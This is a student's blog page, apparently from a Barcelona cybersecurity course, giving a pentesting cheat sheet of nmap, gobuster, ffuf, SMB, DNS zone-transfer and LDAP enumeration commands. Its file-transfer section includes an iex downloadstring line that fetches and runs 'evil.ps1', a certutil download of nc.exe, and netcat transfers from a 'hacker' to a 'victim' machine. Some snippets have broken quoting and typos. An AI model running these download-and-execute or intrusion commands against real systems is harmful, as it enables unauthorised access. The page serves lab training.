<!DOCTYPE html><html><head><meta charset="utf-8">
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <title>Post 1 : Cheat Sheet</title>
    <style>
        html {
            font-size:.875em;
            background:#fff;
            color:#373D49
        }
        body{
            font-size:1rem;
            font-weight:400;
            line-height:2rem
        }
        li{
            font-feature-settings:'kern' 1,'onum' 1,'liga' 1;
            margin-left:1rem
        }
        pre{font-size:1rem;
            padding:.66001rem 9.5px 9.5px;
            line-height:2rem;
            background:linear-gradient(to bottom,#fff 0,#fff .75rem,#f5f7fa .75rem,#f5f7fa 2.75rem,#fff 2.75rem,#fff 4rem);
            background-size:100% 4rem;border-color:#D3DAEA
        }
        pre code{
            padding:0;
            font-size:inherit;
            color:inherit;
            white-space:pre-wrap;
            background-color:transparent;
            border-radius:0
        }
        blockquote p{
            font-size:1rem;
            margin-bottom:.33999rem;
            font-style:italic;
            padding:.66001rem 1rem 1rem;
            border-left:3px solid #A0AABF
        }
        h1,h2,h3,h4,h5,h6{font-family:"Source Sans Pro","Helvetica Neue",Helvetica,Arial,sans-serif;font-feature-settings:'dlig' 1,'liga' 1,'lnum' 1,'kern' 1;font-style:normal;font-weight:600;margin-top:0}
        ul{
            list-style-type:disc;
            margin:1rem 0;
            padding:0 0 0 1rem
        }
        .cap {
            background-image: url("img/inTime.jpeg");
            opacity: 0.9;
        }
    </style>
</head>
<header>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
    <script src="js/bootstrap.min.js"></script>
    <div class="container-fluid  cap text-white sticky-top">
        <div class="container py-5">
            <div class="row">
                <div class="col-sm-12 col-md-6 col-lg-2">
                    <img src="img/58.png" width="250" height="150" style="border-radius: 30%;" class="align-content-md-center align-content-md-start">
                </div>
                <div class="col-sm-12 col-md-6 col-lg-10 ">
                    <p class="display-4 text-sm-center text-md-center text-lg-left">Marc Hortelano</p>
                    <p class="lead text-sm-center text-md-center text-lg-left"> Administració de Sistemes Informàtics en Xarxa, perfil Ciberseguretat</p>
                    <div class="row align-content-md-start">
                        <div class="col-sm-3 col-md-1 col-xl-1">
                            <i class="em em-pushpin" aria-role="presentation" aria-label="PUSHPIN"></i>
                        </div>
                        <div class="col-sm-9 col-md-5 col-xl-3">
                            <p>Barcelona, Espanya</p>
                        </div>
                        <div class="col-sm-3 col-md-1 col-xl-1">
                            <i class="em em-email" aria-role="presentation" aria-label="ENVELOPE"></i>
                        </div>
                        <div class="col-sm-9 col-md-5 col-xl-3">
                            <p>marc.hortelano.7e3@itb.cat</p>
                        </div>
                        <div class="col-sm-3 col-md-1 col-xl-1">
                            <i class="em em-telephone_receiver" aria-role="presentation" aria-label="TELEPHONE RECEIVER"></i>
                        </div>
                        <div class="col-sm-9 col-md-5 col-xl-3">
                            <p>Tel. +34 664 XX XX XX</p>
                        </div>
                    </div>
                </div>

            </div>
        </div>
        <div style="background-color: #F8F8FF;" class="pb-1">
            <nav class="nav nav-tabs flex-column flex-sm-row" id="nav-tab" role="tablist">
                <a class="flex-sm-fill text-sm-center nav-link" href="index.html">Perfil</a>
                <a class="flex-sm-fill text-sm-center nav-link active" href="#">Blog</a>
            </nav>
        </div>
    </div>
</header>
<body>
<div class="container">
<h1 class="display-4 py-5">Pentesting Cheat sheet</h1>
<h2>Potential ports vulnerabilities</h2>
<ul>
    <li> 21 [FTP] It’s possible have anonymous user.</li>
    <li> 22 [SSH] It’s not probable have any vulnerabilities but is the best choise if found some credentials for try first.</li>
    <li> 80 [HTTP] This is a web server. First detect the version about server it’s running, then try to find all directories and the virtual host.</li>
    <li> 110 / 995(ssl) [POP3] This protocol used by email clients. Try the common passwords.</li>
    <li> 143 / 993 [IMAP] Permit complete management of emails box by multiple email clients.</li>
    <li> 445 [HTTPS] Like HTTP protocol it’s web server, and we can do the same. But we can enumerate SSL/TLS certificates on OpenSSL 1.1.0 and lower.</li>
</ul>
<hr>
<h1 class="display-4">Enmeration</h1>
<h2>Port Scanning</h2>
<p>Basic port scaning with bash</p>
<pre><code>for port in {1..65535}; do
  timeout 1 bash -c &quot;echo &gt;/dev/tcp/10.10.10.10/$port&quot; &amp;&amp;
    echo &quot;[*] $port is open&quot; ||
    echo &quot;[*] $port is closed&quot;
done
</code></pre>
<h3>NMAP</h3>
<p><a href="https://nmap.org/">https://nmap.org/</a></p>
<blockquote>
    <p>Scripts define a list of categories they belong to. Currently defined categories are auth, broadcast, brute, default. discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln. Category names are not case sensitive.</p>
</blockquote><br>

    <pre><code>ls /urs/share/nmap/scripts</code></pre>
    <p>First nmap agressive scan for see all open ports</p>
    <pre><code>nmap -T5  -p- --open -v -n <span class="text-primary">10.10.10.10</span>
</code></pre>
<p>When I have all open ports, I can do the second scan for enumeration with default script and the versions of the ports. Parameters -sC equals --script=default</p>
<pre><code>nmap -sC -sV -p22,80,445 <span class="text-primary">10.10.10.10</span>
</code></pre>
<p>ARP Scan</p>
<pre><code>nmap -n -sn -PR <span class="text-primary">10.10.10.10</span>/<span class="text-primary">24</span>
</code></pre>
<p>Reverse DNS Lookup</p>
<pre><code>nmap -sL <span class="text-primary">10.10</span>.<span class="hljs-number">10.10</span>/<span class="text-primary">24</span>
</code></pre>
<p>Using script</p>
<pre><code>nmap -n -Pn --script <span class="text-primary">"vuln and safe"</span> <span class="text-primary">10.10.10.10</span>/<span class="text-primary">24</span>
</code></pre>
<hr>
<h2>HTTP TOOLS</h2>
<h3>Nikto</h3>
<p><a href="https://github.com/sullo/nikto">https://github.com/sullo/nikto</a></p>
<p>Nikto it’s nice tool to examine a web server to find potential problems and security vulnerabilities.</p>
<p> Basic usage</p>
<pre><code>nikto -host https://<span class="text-primary">10.10.10.10</span>/
</code></pre>
<h3>gobuster</h3>
<p> <a href="https://github.com/OJ/gobuster">https://github.com/OJ/gobuster</a></p>
<p>It’s a tool for use brute-force folders and multiple extensions at once.</p>
<p>It has three main modes it can be used with:</p>
<pre><code>dir - the classic directory brute-forcing mode
dns - DNS subdomain brute-forcing mode
vhost - virtual host brute-forcing mode 
</code></pre>
<p ><code>DIR</code> mode</p>
<pre><code >gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://<span class="text-primary">10.10.10.10</span> -x php,txt,html,cgi
</code></pre>
<p ><code>DNS</code> mode</p>
<pre><code>gobuster dns <span class="hljs-operator">-d</span> domain.com -w wordlist.txt -i
</code></pre>
<p><code>vhost</code> mode</p>
<pre><code>gobuster vhost -u domain.com -w wordlist.txt -v
</code></pre>
<h3>WFUZZ</h3>
<p ><a href="https://github.com/xmendez/wfuzz">https://github.com/xmendez/wfuzz</a></p>
<p>Other tool for use brute-force like gobuster. I don’t want to do the same then i will to put some example for scan a machine while HTTP are not accessible. We can return the ports request.</p>
<pre><code >wfuzz -c --hc=<span class="text-info">404</span> -z range,<span class="text-info">1</span>-<span class="text-info">65535</span> http://<span class="text-primary">10.10.10.10</span>:<span class="hljs-number">8080</span>/request_to=http://<span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span>:FUZZ
</code></pre>
<h3>FFUF</h3>
<p><a href="https://github.com/ffuf/ffuf">https://github.com/ffuf/ffuf</a></p>
<p>This tool I realy like, because it’s written in go and i thik it’s the most faster for do this jobs.<br>
    This code works for scan a VHOST and the web page return every time the same size every time.</p>
<pre><code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://domain.com -H <span class="text-primary">"Host: FUZZ.domain.com"</span> -fs <span class="hljs-number">33</span> -fc <span class="hljs-number">401</span>,<span class="hljs-number">403</span>
</code></pre>
<h3>DIRSEARCH</h3>
<p><a href="https://github.com/maurosoria/dirsearch">https://github.com/maurosoria/dirsearch</a></p>
<p>This written in python. I like this tool becase it’s very fastter too and easy to use.</p>
<p>This is my basic usage, do recursive.</p>
<pre><code>dirsearch -u http://domain.com -E -r -w /usr/share/wordlist/wordlist.txt
</code></pre>
<hr>
<h2>SMB SERVICE</h2>
<p>This protocol enable to access files on remote server, as well other resources, including printers.</p>
<h3>Llist all folders</h3>
<pre><code>smbclient -L <span class="text-primary">10.10.10.10</span>

smbmap -H <span class="text-primary">10.10.10.10</span>

/usr/share/doc/python3-impacket/examples/smbclient.py <span class="text-primary">""</span> @<span class="text-primary">10.10.10.10</span>
</code></pre>
<h3 >Generate a samba server with Impacket</h3>
<p><a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py">https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py</a></p>
<h4>Make server on Linux</h4>
<pre><code>impacket-smbserver IGH /root/shells
</code></pre>
<h4>Mount in Windows</h4>
<blockquote>
    <p>powershell</p>
</blockquote>
<pre><code><span class="text-primary">New-PSDrive</span> -Name <span class="text-primary">"IGH"</span> -PSProvider <span class="text-primary">"Filesystem"</span> -Root <span class="text-primary">"\\10.10.10.10\IGH"</span>
</code></pre>
<blockquote>
    <p>without powershell</p>
</blockquote>
<pre><code ><span class="text-primary">net</span> use z: \\<span class="text-primary">10.10.10.10</span>\IGH"
</code></pre>
<h4>>Mount in Linux</h4>
<p>Is needed to have isntalled cifs-utils</p>
<pre><code>sudo mount -t cifs //<span class="text-primary">10.10.10.10</span>/igh ~/my-share/
</code></pre>
<h3>Enumeration null sessions</h3>
<pre><code>smbclient -L 10.10.10.10 -N

rpcclient -U &quot;&quot; -N 10.10.10.10
</code></pre>
<h3 >Escaning with enum4linux</h3>
<pre><code>enum4linux -a 10.10.10.10
</code></pre>
<hr>
<h2>DNS</h2>
<h3>Nmap DNS hostmanes lookup</h3>
<pre><code>nmap -f -dns-server [IP DNS] [target ip range]
</code></pre>
<p>Host lookup</p>
<pre><code>host -t ns 10.10.10.10
</code></pre>
<p>Perform DNS IP Lookup</p>
<pre><code>dig a 10.10.10.10 @nameserver
</code></pre>
<p>Perform MX Record Lookup</p>
<pre><code>dig mx 10.10.10.10 @nameserver
</code></pre>
<p>Perform Zone Transfer with dig</p>
<pre><code> dig axfr 10.10.10.10 @nameserver
</code></pre>
<p>Windows DNS zone Transfer</p>
<pre><code>nslookup -&gt; set type=any -&gt; ls -d 10.10.10.10
</code></pre>
<p>Linux DNS Zone Transfer</p>
<pre><code >dig axfr 10.10.10.10 @nameserver
</code></pre>
<p>DNS Brute Force</p>
<pre><code>dnsrecon -d 10.10.10.10 -d /usr/share/wordlist/dnsmap.txt -t std --xml output.xml
</code></pre>
<hr>
<h2>LDAP SERVICE</h2>
<p>basic enumeration</p>
<pre><code>ldapsearch -x -b &quot;dc=internetghost,dc=co&quot; -H ldap://10.10.10.10.10 -D &quot;cn=admin,dc=internetghost,dc=com&quot; -W
</code></pre>
<h2>Transfer files</h2>
<h3>HTTP</h3>
<h4 >PYTHON</h4>
<p >You can create a temporal http server with python</p>
<pre><code >python3 -m http.server 8000
</code></pre>
<pre><code >python2 -m SimpleHTTPServer 8000
</code></pre>
<p >It also can specify which path to share</p>
<pre><code >python3 -m http.server 8000 --dir /root/shells
</code></pre>
<h4>WINDOWS</h4>
<pre><code>iex(<span class="text-primary">new-object</span> net.webclient).downloadstring(<span class="text-primary">"http://10.10.10.10/evil.ps1)

certutil.exe -urlcache -split -f "</span>http://<span class="text-primary">10.10.10.10</span>/nc.exe<span class="text-primary">" nc.exe

IWR -Uri "</span>http://<span class="text-primary">10.10.10.10</span>/n64.exe<span class="text-primary">" -Outfile "</span>n64.exe<span class="text-primary">"
</span></code></pre>
<h4>LINUX</h4>
<pre><code>curl http://<span class="text-primary">10.10.10.10</span>/evil.php
</code></pre>
<h3>NETCAT</h3>
<p>Hacker Machine</p>
<pre><code>nc -lvnp 4444 &lt; file
</code></pre>
<p>Victim machine</p>
<pre><code>nc 10.10.10.10 4444 &gt; file
</code></pre>
<h3>SSH - SCP</h3>
<p>The methodology is the same, but I prefer transfer write different methods in this example.</p>
<pre><code><span class="text-info"># file</span>
spc /<span class="text-primary">local</span>/folder/file.txt <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="1d686e786f5d">[email&#160;protected]</a><span class="text-primary">10.10.10.10</span>:/path/folder/file.txt

<span class="text-info"># folder</span>
spc -r <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="d5a0a6b0a795">[email&#160;protected]</a><span class="text-primary">10.10.10.10</span>:/folder /path/folder/
</code></pre>
<h3>SAMBA</h3>
<h4>BASH</h4>
<pre><code>sudo impacket-smbserver smbFolder $(<span class="text-primary">pwd</span>)

</code></pre>
<h4>Powershell</h4>
<pre><code>PS&gt; <span class="text-primary">New-PSDrive</span> -Name <span class="text-primary">"SharedFolder"</span> -PSProvider <span class="text-primary">"FileSystem"</span> -Root <span class="text-primary">"\\10.10.14.18\smbFolder"</span>
PS&gt; dir SharedFolder:\
</code></pre>
<h4 >Using Credentials</h4>
<pre><code>sudo impacket-smbserver smbFolder $(<span class="text-primary">pwd</span>) -smb2support -user jack -password <span class="hljs-number">1234</span>
</code></pre>
<pre><code >PS &gt; $pass= convertto-securestring '1234' -AsPlainText -Force
PS &gt; $cred = New-Object System.Managment.Automation.PSCredential('jack', $pass)
PS &gt; New-PSDrive -Name &quot;SharedFolder&quot; -PSProvider &quot;FileSystem&quot; -Credential $cred  -Root &quot;\\10.10.14.18\smbFolder&quot;
</code></pre>
</div>
</body>
<footer class=" py-4 bg-dark text-white-50">
    <div class="container text-center">
        <small class="text-muted">Copyright &copy; <a href="http://igh2.es/">IGH²</a></small>
    </div>
</footer>
</html>